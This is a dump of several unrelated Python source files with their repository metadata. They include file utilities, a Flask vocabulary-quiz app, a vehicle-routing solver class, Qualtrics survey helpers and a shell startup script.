\"\n \"list is expected. Value of parameter: %s. \"\n \"Converting parameter to a list!\",\n FileUtils.make_path,\n dirs,\n )\n dirs = [dirs]\n return os.path.join(basedir, *dirs)\n\n @classmethod\n def get_parent_dir_name(cls, dir):\n path = Path(dir)\n return path.parent.__str__()\n\n @classmethod\n def is_dir_parent_of_dir(cls, parent, dir):\n parent_path_parts = Path(parent).parts\n dir_path_parts = Path(dir).parts\n try:\n idx = dir_path_parts.index(parent_path_parts[0])\n except ValueError:\n # Do not log anything\n return False\n\n for i in range(len(dir_path_parts)):\n if len(parent_path_parts) - 1 >= i and not dir_path_parts[i] == parent_path_parts[idx + i]:\n return False\n return True\n\n @classmethod\n def get_path_components(cls, path):\n return path.rsplit(os.sep)\n\n @classmethod\n def get_mod_dates_of_files(cls, basedir, *files):\n result = {}\n for f in files:\n f = FileUtils.join_path(basedir, f)\n if FileUtils.does_file_exist(f):\n result[f] = FileUtils.get_mod_date_of_file(f)\n else:\n result[f] = None\n return result\n\n @classmethod\n def get_home_path(cls, path):\n return os.path.expanduser(path)\n\n @classmethod\n def copy_file(cls, src, dest):\n LOG.info(f\"Copying file. {src} -> {dest}\")\n shutil.copyfile(src, dest)\n\n @classmethod\n def _move_files(cls, src, dst):\n FileUtils.ensure_dir_created(dst)\n files = os.listdir(src)\n for f in files:\n src_path = os.path.join(src, f)\n dst_path = os.path.join(dst, f)\n LOG.info(\"Moving: {} --> {}\", src_path, dst_path)\n os.rename(src_path, dst_path)\n\n @classmethod\n def change_cwd(cls, dir):\n cls.previous_cwd = os.getcwd()\n cls._change_cwd(dir)\n\n @classmethod\n def get_filename_from_cwd(cls, filename):\n return os.path.join(os.getcwd(), filename)\n\n @classmethod\n def reset_cwd(cls):\n if not cls.previous_cwd:\n LOG.warning(\"Can't reset CWD as there's no previous CWD saved!\")\n cls._change_cwd(cls.previous_cwd)\n\n @classmethod\n def _change_cwd(cls, dir):\n try:\n os.chdir(dir)\n LOG.info(\"Changed current working directory: %s\", dir)\n except OSError:\n LOG.error(\"Can't change the Current Working Directory to %s\", dir)\n\n @classmethod\n def _hash_files_in_dirs(cls, dirs):\n hash_data = {}\n for dir in dirs:\n hash_data[dir] = {}\n files = os.listdir(dir)\n for f in files:\n file_to_hash = os.path.join(dir, f)\n hash = cls.hash_file(file_to_hash)\n hash_data[dir][hash] = f\n return hash_data\n\n @classmethod\n def hash_file(cls, f):\n blocksize = 65536\n with open(f, \"rb\") as file:\n hasher = hashlib.md5()\n buf = file.read(blocksize)\n while len(buf) > 0:\n hasher.update(buf)\n buf = file.read(blocksize)\n return hasher.hexdigest()\n\n @classmethod\n def is_file(cls, f):\n if not os.path.exists(f):\n raise ValueError(\"Path does not exist: %s\", f)\n return os.path.isfile(f)\n\n @classmethod\n def ensure_is_file(cls, f):\n is_file = FileUtils.is_file(f)\n if not is_file:\n raise ValueError(\"%s is not a file!\", f)\n\n @classmethod\n def is_dir(cls, d, throw_ex=True):\n if not os.path.exists(d):\n if throw_ex:\n raise ValueError(\"Path does not exist: %s\", d)\n return os.path.isdir(d)\n\n @classmethod\n def get_unique_filepath(cls, dest_file):\n while FileUtils.does_path_exist(dest_file):\n file_path, ext = os.path.splitext(dest_file)\n dest_file = file_path + \"_1\" + ext\n return dest_file\n\n @classmethod\n def read_file(cls, f):\n return open(f, \"r\").read()\n\n @classmethod\n def read_file_to_list(cls, f):\n return open(f, \"r\").read().splitlines()\n\n @classmethod\n def does_file_contain_str(cls, file, string):\n with open(file) as f:\n if string in f.read():\n return True\n return False\n\n @classmethod\n def create_symlink_path_dir(\n cls, link_name, linked_path, dest_dir, remove_link_if_exists=True, remove_linked_file_if_exists=False\n ):\n link_src = linked_path\n link_dest = FileUtils.join_path(dest_dir, link_name)\n if remove_link_if_exists:\n if os.path.islink(link_dest):\n LOG.info(f\"Removing link dest: {link_dest}\")\n os.unlink(link_dest)\n else:\n LOG.warning(f\"Not removing not existing link dest: {link_dest}\")\n if remove_linked_file_if_exists:\n if os.path.exists(link_src) and FileUtils.is_file(link_src):\n LOG.info(f\"Removing linked file: {link_src}\")\n FileUtils.remove_file(link_src)\n elif os.path.exists(link_src) and FileUtils.is_dir(link_src):\n LOG.info(f\"Removing linked dir: {link_src}\")\n shutil.rmtree(link_src)\n else:\n LOG.warning(f\"Not removing not existing linked file or directory: {link_src}\")\n\n FileUtils.create_symlink(link_src, link_dest)\n\n @classmethod\n def create_symlink(cls, link_src, link_dest):\n LOG.info(\"Creating symlink: %s -> %s\", link_dest, link_src)\n # os.symlink(src, dest)\n # src: Already existing path to create the link pointing to\n # dest: Link name\n try:\n os.symlink(link_src, link_dest)\n except OSError as e:\n if e.errno == errno.EEXIST:\n LOG.warning(\"Symlink does exist, ignoring. Details: %s\", str(e))\n\n @classmethod\n def get_temp_file_name(cls, prefix=None):\n kwargs = {\"delete\": False}\n if prefix:\n kwargs[\"prefix\"] = prefix\n tmp = tempfile.NamedTemporaryFile(**kwargs)\n return tmp.name\n\n @classmethod\n def write_bytesio_to_file(cls, filename, bytesio):\n \"\"\"\n Write the contents of the given BytesIO to a file.\n Creates the file or overwrites the file if it does\n not exist yet.\n \"\"\"\n with open(filename, \"wb\") as outfile:\n # Copy the BytesIO stream to the output file\n outfile.write(bytesio.getbuffer())\n\n\nclass JsonFileUtils:\n @classmethod\n @timeit\n def write_data_to_file_as_json(cls, path, data, pretty=False):\n import json\n\n dirname = os.path.dirname(path)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n if not os.path.isdir(dirname):\n raise ValueError(\"Should have a dir in path, not a file: {}\".format(dirname))\n\n bytes_written = -1\n LOG.trace(\"Starting to write to file: %s\", path)\n with open(path, \"w\") as file:\n kwargs = {\"sort_keys\": True}\n if pretty:\n kwargs[\"indent\"] = 4\n json.dump(data, file, **kwargs)\n bytes_written = file.tell()\n LOG.trace(\"Finished writing to file: %s\", path)\n return bytes_written\n\n @classmethod\n def load_data_from_json_file(\n cls, file, create_if_not_exists=False, swallow_file_not_found=False, swallow_value_error=False\n ) -> Tuple[Any, int]:\n import json\n\n try:\n with open(file, \"r\") as f:\n data = json.load(f)\n bytes_read = f.tell()\n return data, bytes_read\n except FileNotFoundError as e:\n LOG.exception(\"Error while opening file: %s\", file)\n if create_if_not_exists:\n LOG.info(\"Creating new empty file: %s\", file)\n FileUtils.create_new_empty_file(file)\n if swallow_file_not_found:\n return None, 0\n raise e\n except ValueError as e:\n LOG.exception(\"Error while reading file: %s\", file)\n if swallow_value_error:\n return None, 0\n raise e\n\n\nclass CsvFileUtils:\n @classmethod\n def append_rows_to_csv_file(cls, file_path, data: List[Iterable[Any]], header=None):\n import csv\n\n # Validation\n if not isinstance(data, list):\n raise ValueError(\"Expected list of data for CSV row!\")\n if len(data) > 0 and not all([isinstance(cell, str) for row in data for cell in row]):\n raise ValueError(\"Expected list of str items for CSV row!\")\n\n new_file = cls._ensure_parent_dir_exists(file_path)\n with open(file_path, \"a\", newline=\"\") as csvfile:\n csv_writer = csv.writer(csvfile, delimiter=\";\", quotechar=\"|\", quoting=csv.QUOTE_MINIMAL)\n if new_file and header:\n csv_writer.writerow(header)\n for row in data:\n csv_writer.writerow(row)\n\n @classmethod\n def append_row_to_csv_file(cls, file_path, data: List[str], header=None):\n data = [data]\n CsvFileUtils.append_rows_to_csv_file(file_path, data, header=header)\n\n @classmethod\n def _ensure_parent_dir_exists(cls, path):\n parent_dir = FileUtils.get_parent_dir_name(path)\n if not FileUtils.is_dir(parent_dir, throw_ex=False):\n FileUtils.create_new_dir(parent_dir)\n new_file = False if os.path.exists(path) else True\n return new_file\n","repo_name":"szilard-nemeth/python-commons","sub_path":"pythoncommons/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":33429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28385294923","text":"# navigate to the Features folder\nimport sys\nsys.path.append(sys.path[0]+'/./Features')\n\n# UNIVERSAL IMPORT\nfrom universal_imports import *\n\n#------------------------------\n\n# import all needed features\nimport helper\nimport grader\nimport quizzer\n\n#------------------------------\n\n# initialize the Data Store object\ndata_store = helper.data_store()\n\n#------------------------------\n\napp = flask.Flask(__name__, template_folder = 'Flask/templates', static_folder = 'Flask/static')\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef homepage():\n \"\"\"\n DESCRIPTION:\n Homepage of the website.\n These are what's going on:\n 1. get the user who's studying\n 2. check all study sets under the user\n 3. reformat the sets if needed\n \"\"\"\n\n # global variable\n global data_store\n\n #--------------------------\n\n # use sample user if no user is specified\n if data_store.login_status == False:\n # hardcode the sample user\n user = \"sample_user_1\"\n data_store.user = user\n\n else:\n # get the user\n user = data_store.user\n\n # gets all study sets under the user\n study_sets = helper.get_study_sets(user) # list of strings\n\n # reformat all sets belonging to the user\n for set_name in study_sets:\n\n # path to the study set\n path = \"Data/Users/\" + user + \"/\" + set_name + \".csv\"\n\n # DEBUGGING\n print(path)\n\n # read in the study set\n read_in_df = pd.read_csv(path, header = None)\n\n # check if the dataframe is already reformatted\n # get the number of columns of the dataframe\n num_cols = len(read_in_df.columns)\n\n # if the number of columns is 3, then it is already reformatted\n if num_cols >= 3:\n pass\n\n else:\n # reformat the dataframe\n set_df = helper.reformat_set_df(read_in_df)\n set_df.to_csv(path, index = False)\n\n #--------------------------\n\n \"\"\"\n Note:\n - Information on drop down menu: https://stackoverflow.com/questions/66627718/how-to-grab-the-value-from-the-drop-down-menu-using-flask\n \"\"\"\n\n # random a number from 1 to 5(inclusive)\n random_num = random.randint(1, 5)\n\n # random image on home page\n image_name = \"home \" + str(random_num) + \".gif\"\n\n home_image_address = flask.url_for('static', filename = image_name) \n\n return flask.render_template(\"home.html\",\\\n user = user,\\\n study_sets = study_sets,\\\n image_address = home_image_address)\n\n#------------------------------\n\n@app.route(\"/switch_user\", methods = ['POST'])\ndef switch_user():\n \"\"\"\n DESCRIPTION:\n Change the user's to access different study sets\n \"\"\"\n\n # global variable\n global data_store\n\n # get the current user\n current_user = data_store.user\n\n # render the page\n return flask.render_template(\"switch_user.html\", user = current_user)\n\n#------------------------------\n\n@app.route(\"/switch_user_result\", methods = ['POST'])\ndef switch_user_result():\n \"\"\"\n DESCRIPTION:\n Result of the log in effort\n \"\"\"\n\n # global variable\n global data_store\n\n # request user name and password\n user_name = flask.request.form.get('user_name')\n password = flask.request.form.get('password')\n\n # read in the logins data\n logins_df = pd.read_csv(\"Data/Logins.csv\")\n\n # check if the user exists\n if user_name in logins_df.User.values:\n\n # get the user's password\n user_password = logins_df[logins_df['User'] == user_name]['Password'].values[0]\n \n # DEBUGGING\n print(\"Saved Password: \", user_password)\n\n # check if the password is correct or if there is no password (sample user)\n if (user_password == password) or (type(user_password) != str):\n\n # update the data store\n data_store.login_status = True\n data_store.user = user_name\n\n # render the page\n return flask.render_template(\"switch_user_success.html\",\\\n user = user_name)\n\n else:\n\n # render the page\n return flask.render_template(\"switch_user_fail.html\")\n\n else:\n\n # render the page\n return flask.render_template(\"switch_user_fail.html\")\n\n#------------------------------\n\n@app.route(\"/writing_practice_start\", methods = ['GET', 'POST'])\ndef writing_practice_start():\n \"\"\"\n DESCRIPTION:\n This is the first page of the writing practice feature.\n It will initialize the study set, shuffle the words, and ask the first words.\n These are what's going on:\n 1. get the study set that the user wants to study\n 2. read in the set from local storage\n 3. shuffle the set and stored the shuffled order in data_store\n 4. get the first word and definition\n 5. ask the first word, then redirect to the check result page\n \"\"\"\n\n # global variable\n global data_store\n\n # get the requested study set\n chosen_set_name = flask.request.form.get('set')\n data_store.chosen_set_name = chosen_set_name\n\n # path to the set\n path = \"Data/Users/\" + data_store.user + \"/\" + chosen_set_name + \".csv\"\n data_store.set_path = path\n\n # read in the study set\n set_df = pd.read_csv(path)\n data_store.set_df = set_df\n data_store.to_export_df = set_df.copy()\n\n # get the study order\n study_indicies = quizzer.get_study_order(set_df)\n data_store.study_indicies = study_indicies\n\n # get the first word\n data_store.current_index = data_store.study_indicies.pop()\n\n # get the first definition\n first_definition = set_df.at[data_store.current_index, \"Definition\"]\n\n #--------------------------\n\n return flask.render_template(\"writing_practice.html\", definition = first_definition)\n\n#------------------------------\n\n@app.route(\"/writing_practice\", methods = ['GET', 'POST'])\ndef writing_practice():\n \"\"\"\n DESCRIPTION:\n This is a subsequent page of the writing practice feature.\n These are what's going on:\n 1. get the next word and definition\n 2. ask the next word\n 3. redirect to the check result page\n \"\"\"\n\n # global variable\n global data_store\n\n # if the study set round is completed, redirect to the completed page\n if len(data_store.study_indicies) == 0:\n\n return flask.render_template(\"set_completed.html\")\n\n else:\n\n # get the next word\n data_store.current_index = data_store.study_indicies.pop()\n\n # get the next definition\n definition = data_store.set_df.at[data_store.current_index, \"Definition\"]\n\n #--------------------------\n\n return flask.render_template(\"writing_practice.html\", definition = definition)\n\n#------------------------------\n\n@app.route(\"/writing_result\", methods = ['GET'])\ndef writing_result():\n \"\"\"\n DESCRIPTION:\n This is the page that checks the user's answer.\n These are what's going on:\n 1. get the user's answer\n 2. get the correct answer\n 3. compare the two answers, and display whether the user is correct or not\n \"\"\"\n\n # global variable\n global data_store\n\n # get the user's answer\n user_answer = flask.request.args.get('user_answer')\n\n # dataframe information\n set_df = data_store.set_df\n current_index = data_store.current_index\n\n # print(helper.data_store.set_df.at[helper.data_store.current_index, \"Word\"])\n\n # get the correct answer\n assessment = grader.check_answer(user_answer, set_df, current_index)\n\n # if the answer is correct\n if assessment == True:\n\n # to export df\n to_export_df = data_store.to_export_df\n\n # update the data of the result\n to_export_df = helper.update_data_after_answer(assessment, to_export_df, current_index)\n\n data_store.to_export_df = to_export_df\n\n # update the data\n data_store = helper.update_and_export_data(data_store)\n\n #--------------------------\n\n # random a number from 1 to 5 (inclusive)\n random_num = random.randint(1, 5)\n\n # random image on home page\n image_name = \"correct \" + str(random_num) + \".gif\"\n\n # DEBUGGING\n print(\"IMAGE NAME: \" + image_name)\n\n correct_image_address = flask.url_for('static', filename = image_name) \n\n #--------------------------\n\n # render webpage\n return flask.render_template(\"writing_result_correct.html\",\\\n word = user_answer,\\\n image_address = correct_image_address)\n\n else:\n\n # to export df\n to_export_df = data_store.to_export_df\n\n # update the data of the result\n to_export_df = helper.update_data_after_answer(False, to_export_df, current_index)\n\n data_store.to_export_df = to_export_df\n\n # update the data\n data_store = helper.update_and_export_data(data_store)\n\n #--------------------------\n\n # random a number from 1 to 5 (inclusive)\n random_num = random.randint(1, 5)\n\n # random image on home page\n image_name = \"wrong \" + str(random_num) + \".gif\"\n\n wrong_image_address = flask.url_for('static', filename = image_name) \n\n #--------------------------\n\n # render webpage\n return flask.render_template(\"writing_result_wrong.html\",\\\n user_answer = user_answer,\\\n correct_answer = result,\\\n image_address = wrong_image_address)\n\n#------------------------------\n\n@app.route(\"/learning_progress\", methods = ['GET'])\ndef learning_progress():\n\n \"\"\"\n DESCRIPTION:\n Show the user the learning progress on a particular study set.\n \"\"\"\n\n # global variable\n global data_store\n\n # get the requested study set\n chosen_set_name = flask.request.args.get('set')\n data_store.chosen_set_name = chosen_set_name\n\n # path to the set\n path = \"Data/Users/\" + data_store.user + \"/\" + chosen_set_name + \".csv\"\n data_store.set_path = path\n\n # read in the study set\n set_df = pd.read_csv(path)\n data_store.set_df = set_df\n\n # sort by mastery level\n set_df = set_df.sort_values(by = ['Mastery'], ascending = False)\n\n # filter the set to only contains words with certain conditions\n mastered_df = set_df[set_df['Mastery'] == 3]\n learning_df = set_df[(set_df['Mastery'] == 1) | (set_df['Mastery'] == 2)]\n not_learned_df = set_df[set_df['Mastery'] == 0]\n \n # get the metrics\n num_mastered = len(mastered_df)\n num_learning = len(learning_df)\n num_not_learned = len(not_learned_df)\n num_set = len(set_df)\n\n # calculate the percentage of words mastered, rounded to the nearest integer\n percent_mastered = round(num_mastered / num_set * 100)\n\n #--------------------------\n\n return flask.render_template(\"learning_progress.html\",\\\n study_set = chosen_set_name,\\\n num_mastered = num_mastered,\\\n num_learning = num_learning,\\\n num_not_learned = num_not_learned,\\\n num_set = num_set,\\\n percent_mastered = percent_mastered,\\\n study_set_html = [set_df.to_html(classes = 'study_set', header = \"true\")])\n\n#------------------------------\n\n@app.route(\"/reset_progress\", methods = ['GET'])\ndef reset_progress():\n\n \"\"\"\n DESCRIPTION:\n Reset the mastery level of all words in the study set\n \"\"\"\n\n # global variable\n global data_store\n\n # get the requested study set\n chosen_set_name = data_store.chosen_set_name\\\n\n # path to the set\n path = data_store.set_path\n\n # read in the study set\n set_df = pd.read_csv(path)\n data_store.set_df = set_df\n\n # reset the mastery level\n set_df['Mastery'] = 0\n\n # export the dataframe\n set_df.to_csv(path, index = False)\n data_store.set_df = set_df\n\n # sort by mastery level\n set_df = set_df.sort_values(by = ['Mastery'], ascending = False)\n\n # filter the set to only contains words with certain conditions\n mastered_df = set_df[set_df['Mastery'] == 3]\n learning_df = set_df[(set_df['Mastery'] == 1) | (set_df['Mastery'] == 2)]\n not_learned_df = set_df[set_df['Mastery'] == 0]\n \n # get the metrics\n num_mastered = len(mastered_df)\n num_learning = len(learning_df)\n num_not_learned = len(not_learned_df)\n num_set = len(set_df)\n\n # calculate the percentage of words mastered, rounded to the nearest integer\n percent_mastered = round(num_mastered / num_set * 100)\n\n #--------------------------\n\n return flask.render_template(\"reset_progress.html\",\\\n study_set = chosen_set_name,\\\n num_mastered = num_mastered,\\\n num_learning = num_learning,\\\n num_not_learned = num_not_learned,\\\n num_set = num_set,\\\n percent_mastered = percent_mastered,\\\n study_set_html = [set_df.to_html(classes = 'study_set', header = \"true\")])\n\n#------------------------------\n@app.errorhandler(404)\ndef page_not_found(e):\n return flask.render_template(\"404_page.html\")\n\n#------------------------------\n@app.errorhandler(500)\ndef page_not_found(e):\n return flask.render_template(\"500_page.html\")\n\n#------------------------------\nif __name__ == '__main__':\n\n app.run(port = 2700)","repo_name":"NguyenTran2002/VoKab","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7888259012","text":"from pathlib import Path\nfrom typing import List, Optional\n\n\nclass Command(object):\n def execute(self, arguments: List[str]):\n raise NotImplementedError\n\n @staticmethod\n def get_data_path(directory: str = \"Mods\") -> Path:\n return Path(\"./data\").joinpath(directory)\n\n @staticmethod\n def get_path_from_arguments(arguments: List[str]) -> Optional[Path]:\n if len(arguments) == 0:\n print(\"Please provide path as a first argument\")\n return None\n\n mod_path = Path(arguments[0])\n if not mod_path.exists():\n print(\"Provided path does not exist. : {}\".format(str(mod_path)))\n return None\n\n path = mod_path.joinpath(\"Mods\")\n if not path.exists():\n print(\"Provided path seems not a mod directory. : {}\".format(\n str(mod_path)))\n return None\n\n return path\n","repo_name":"takaaki-mizuno/7d2d_rh_localize_jp","sub_path":"sdtd_mod_localizer/commands/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9104924453","text":"# -*- coding: utf-8 -*-\n\"\"\"startup.py - loaded into interactive Python prompts.\"\"\"\n\nprint(\"(.startup.py)\")\n\nimport collections, datetime, itertools, math, os, pprint, re, sys, time\nprint(\"(imported collections, datetime, itertools, math, os, pprint, re, sys, time)\")\n\npp = pprint.pprint\n\n\n# paste code into the repl.\ndef paste():\n import textwrap\n exec(textwrap.dedent(sys.stdin.read()), globals())\n\n\n# readline and history support.\ndef hook_up_history():\n try:\n import readline\n except ImportError:\n print(\"No readline, use ^H.\")\n else:\n import atexit\n import rlcompleter\n\n class IndentableCompleter(rlcompleter.Completer):\n def complete(self, text, state):\n if text == \"\" or text.isspace():\n return [\" \", None][state]\n else:\n return super.complete(text, state)\n\n readline.parse_and_bind(\"tab: complete\")\n readline.set_completer(IndentableCompleter().complete)\n\n history_path = os.path.expanduser(\"~/.pyhistory{0}\".format(sys.version_info[0]))\n\n if os.path.exists(history_path):\n readline.read_history_file(history_path)\n\n def save_history():\n import readline\n readline.write_history_file(history_path)\n\n atexit.register(save_history)\n\n\n# don't do history stuff if we are IPython, it has its own thing.\nis_ipython = \"In\" in globals()\nif not is_ipython:\n hook_up_history()\n\n\n# get rid of globals we don't want.\ndel is_ipython, hook_up_history\n","repo_name":"n0bml/dotfiles","sub_path":"startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23911556007","text":"import time\nimport copy\n\nfrom src.solution_methods import *\nfrom src.route_classes import *\nfrom src.objects_managers import *\nfrom src.solution_classes import *\nfrom src import file_log\nfrom src import execution_log\nfrom src.objects_managers import ConstraintsObjects\n\n\nfrom src.solvers import SolverDPDPTW\nfrom src.solution_check import solution_check, get_solution_check_complete_data\n\n\nclass SolverDPDPTWHeterogeneousFleet(SolverDPDPTW):\n\n def __init__(self):\n super().__init__()\n\n def initialize_class_attributes(self):\n super().initialize_class_attributes()\n self.fleet = None\n\n def create_routes(self):\n routes = []\n for fleet_item in self.fleet.values():\n for i in range(fleet_item[\"size\"]):\n routes.append(Route(fleet_item[\"types\"]))\n \n return routes\n\n def insert_fixed(self, solution):\n routes = self.create_routes()\n for route_pos, route_fixed_dict in enumerate(self.fixed_requests):\n route_requests = route_fixed_dict[\"requests\"]\n route_order = route_fixed_dict[\"route\"]\n route_returned = None\n \n fleet_type_data = self.fleet[route_fixed_dict[\"fleet_type\"]]\n vehic_type_needed = fleet_type_data[\"types\"]\n \n i = 0\n while (route_returned is None):\n route_attendance_type = routes[i].get_attendance_type()\n if (route_attendance_type != vehic_type_needed):\n i += 1\n continue\n solution.add_route(routes[i])\n route_returned = self.insert_fixed_route_in_solution(\n routes[i],\n solution,\n route_pos,\n route_order,\n route_requests\n )\n routes.pop(i)\n \n i += 1\n route_returned.set_start_position(route_fixed_dict[\"start\"])\n \n for route in routes:\n solution.add_route(route)\n \n solution.set_objective_value(self.obj_func.get_solution_cost(solution))\n\n return solution\n\n\n def get_attr_relation_reader(self):\n read_solv_attr_rela = {\n \"input_name\": \"output_name\",\n \"vertices\": \"vertices\",\n \"requests\": \"requests\",\n \"number_of_requests\": \"number_of_requests\",\n \"fixed_routes_dict\": \"fixed_requests\",\n \"fleet\" : \"fleet\"\n }\n return read_solv_attr_rela\n","repo_name":"thuzax/vrp-solver","sub_path":"solver/src/solvers/SolverDPDPTWHeterogeneousFleet.py","file_name":"SolverDPDPTWHeterogeneousFleet.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"28267938420","text":"import numpy as np\nimport pandas as pd\nimport sys\n\nimport settings\n\nclass QHelpers:\n def __init__(self, qualtrics_object, survey_data):\n self.q = qualtrics_object\n self.survey = self.q.survey_get(settings.qualtrics_survey)\n self.survey_data = survey_data\n self.N = len(self.survey_data['responses'])\n def mc2list(self, qcol, percent=False):\n try:\n qid = self.survey['exportColumnMap'][qcol]['question']\n question = self.survey['questions'][qid]\n except KeyError:\n raise RuntimeError(\"{0} is not a multiple choice, single-answer question\\n\".format(qcol))\n if question['questionType']['type'] == \"MC\" and (question['questionType']['selector'] == \"SAVR\" or question['questionType']['selector'] == \"SAHR\"):\n matrix=False\n elif question['questionType']['type'] == \"Matrix\" and question['questionType']['subSelector'] == \"SingleAnswer\":\n matrix=True\n else:\n raise RuntimeError(\"{0} is not a multiple choice, single-answer type question\\n\".format(qcol))\n return None\n n=0\n choices = question['choices']\n ck = sorted(choices.keys(), key=int)\n data = pd.Series([0]*len(ck), name=qcol, index=ck, dtype=int)\n for i in self.survey_data['responses']:\n ans = i[qcol]\n if ans == \"\":\n pass # Throw out questions they didn't answer\n else:\n n+=1\n data[ans] += 1\n if percent:\n if n > 0:\n data = data.apply(lambda x:x/n)\n names = []\n keys = data.index\n for i in keys:\n if not matrix:\n names.append(choices[i]['choiceText'])\n else:\n names.append(choices[i]['description'])\n data.index = names\n return data\n\n def ma2list(self, qcol): #Compiles the raw respondants from a multiple-choice-multiple-answer question\n qcols = {}\n for i in self.survey['exportColumnMap'].keys():\n if i.startswith(qcol+\"_\"):\n if i.endswith(\"_TEXT\"):\n continue\n try:\n qcols[i] = self.survey['exportColumnMap'][i]['choice'].split(\".\")\n except KeyError:\n raise RuntimeError(\"{0} is not a multiple choice-multiple answer question\\n\".format(qcol))\n qn = sorted(qcols.keys(), key=lambda k: int(qcols[k][2]))\n qid = self.survey['exportColumnMap'][qn[0]]['question']\n question = self.survey['questions'][qid]\n if question['questionType']['type'] != \"MC\" and question['questionType']['selector'] != \"MAVR\":\n raise RuntimeError(\"{0} is not a multiple choice-multiple answer question\\n\".format(qcol))\n return None\n choices = question['choices']\n data = pd.Series([0]*len(qn), name=qcol, index=qn, dtype=int)\n for i in self.survey_data['responses']:\n for j in i:\n if j in qn:\n ans = i[j]\n if (ans):\n data[j] += 1\n names = []\n for i in qn:\n c = qcols[i][2]\n names.append(choices[c]['choiceText'])\n data.index = names\n return data\n\n def list_grouper(self, *args):\n r = pd.DataFrame([*args])\n r = r.transpose()\n return r\n\n def mcpaired(self, qcol1, qcol2):\n qid1 = self.survey['exportColumnMap'][qcol1]['question']\n qid2 = self.survey['exportColumnMap'][qcol2]['question']\n question1 = self.survey['questions'][qid1]\n question2 = self.survey['questions'][qid2]\n if not (question1['questionType']['type'] == \"MC\" and (question1['questionType']['selector'] == \"SAVR\" or question1['questionType']['selector'] == \"SAHR\")):\n sys.stderr.write(\"{0} is not a multiple choice, single-answer question\\n\".format(qcol1))\n return None\n if not (question2['questionType']['type'] == \"MC\" and (question2['questionType']['selector'] == \"SAVR\" or question2['questionType']['selector'] == \"SAHR\")):\n sys.stderr.write(\"{0} is not a multiple choice, single-answer question\\n\".format(qcol2))\n return None\n choices1 = question1['choices']\n choices2 = question2['choices']\n s1 = np.array([np.NaN]*self.N)\n s2 = np.array([np.NaN]*self.N)\n rids = []\n for i,j in zip(self.survey_data['responses'], range(self.N)):\n s1[j] = i[qcol1]\n s2[j] = i[qcol2]\n rids.append(i['ResponseID'])\n data = pd.DataFrame(index=rids)\n data[qcol1] = s1\n data[qcol2] = s2\n names1 = []\n keys1 = sorted(choices1.keys(), key=int)\n for i in keys1:\n names1 += [choices1[i]['choiceText']]\n names2 = []\n keys2 = sorted(choices2.keys(), key=int)\n for i in keys2:\n names2 += [choices2[i]['choiceText']]\n return {\"pairs\":data, \"keys1\":keys1,\"keys2\":keys2, \"names1\":names1,\"names2\":names2}\n\n def pairs2list(self, mcp):\n pairs = mcp['pairs']\n k1 = list(map(int, mcp['keys1']))\n k2 = list(map(int, mcp['keys2']))\n cname1 = pairs.columns[0]\n cname2 = pairs.columns[1]\n group = pairs.groupby(cname2)\n data = pd.DataFrame(index=k1)\n for i in range(len(k2)):\n k = k2[i]\n subset = group.get_group(k)[cname1]\n sums = pd.Series([0]*len(k1), index=k1)\n for i in range(len(k1)):\n ik = k1[i]\n bools = subset == ik\n sums[ik] = bools.sum()\n data[k] = sums\n data.index = mcp['names1']\n data.columns = mcp['names2']\n return data\n\n def mcmatrix(self, qcol):\n qcols = {}\n for i in self.survey['exportColumnMap'].keys():\n if i.startswith(qcol+\"_\"):\n if i.endswith(\"_TEXT\"):\n continue\n try:\n qcols[i] = self.survey['exportColumnMap'][i]['subQuestion'].split(\".\")\n except KeyError:\n raise RuntimeError(\"{0} is not a multiple choice matrix question\\n\".format(qcol))\n qn = sorted(qcols.keys(), key=lambda k: int(qcols[k][2]))\n qid = self.survey['exportColumnMap'][qn[0]]['question']\n question = self.survey['questions'][qid]\n if question['questionType']['type'] != \"Matrix\" and question['questionType']['subSelector'] != \"SingleAnswer\":\n raise RuntimeError(\"{0} is not a multiple choice matrix question\\n\".format(qcol))\n return None\n choices = question['choices']\n sub_questions = question['subQuestions']\n data = pd.DataFrame({})# index=range(len(choices)))\n for i in qn:\n row = self.mc2list(i)\n data[i] = row\n qnames = []\n qkeys = sorted(sub_questions.keys(), key=int)\n for i in qkeys:\n qnames += [sub_questions[i]['description']]\n data.columns = qnames\n data = data.transpose()\n return data\n\n def hasq_in_val(self, qcol, values):\n rids = []\n data = pd.Series(np.array([0]*self.N, dtype=np.bool))\n for i,j in zip(self.survey_data['responses'], range(self.N)):\n if i[qcol] in values:\n data[j] = True\n else:\n data[j] = False\n rids.append(i['ResponseID'])\n data.index = rids\n return data\n def hasqs_in_val(self, qcols, values):\n acc = False\n for i in qcols:\n hq = self.hasq_in_val(i, values)\n acc |= hq\n return acc","repo_name":"computergeek125/writ3562w_itmrp_survey","sub_path":"qualtrics_api/Qv3_helpers.py","file_name":"Qv3_helpers.py","file_ext":"py","file_size_in_byte":7675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15410015455","text":"from __future__ import print_function\nfrom __future__ import absolute_import\n\n# from ctypes import *\n\nimport ctypes\nimport socket\n\n# UDP provides a procedure for application programs to send\n# messages to other programs with a minimum of protocol mechanism. The\n# protocol is transaction oriented, and delivery and duplicate protection\n# are not guaranteed. Applications requiring ordered reliable delivery of\n# streams of data should use the Transmission Control Protocol\n\n# Format\n# ------\n\n\n# 0 7 8 15 16 23 24 31\n# +--------+--------+--------+--------+\n# | Source | Destination |\n# | Port | Port |\n# +--------+--------+--------+--------+\n# | | |\n# | Length | Checksum |\n# +--------+--------+--------+--------+\n# |\n# | data octets ...\n# +---------------- ...\n\n# User Datagram Header Format\n\n\n# Source Port is an optional field, when meaningful, it indicates the port\n# of the sending process, and may be assumed to be the port to which a\n# reply should be addressed in the absence of any other information. If\n# not used, a 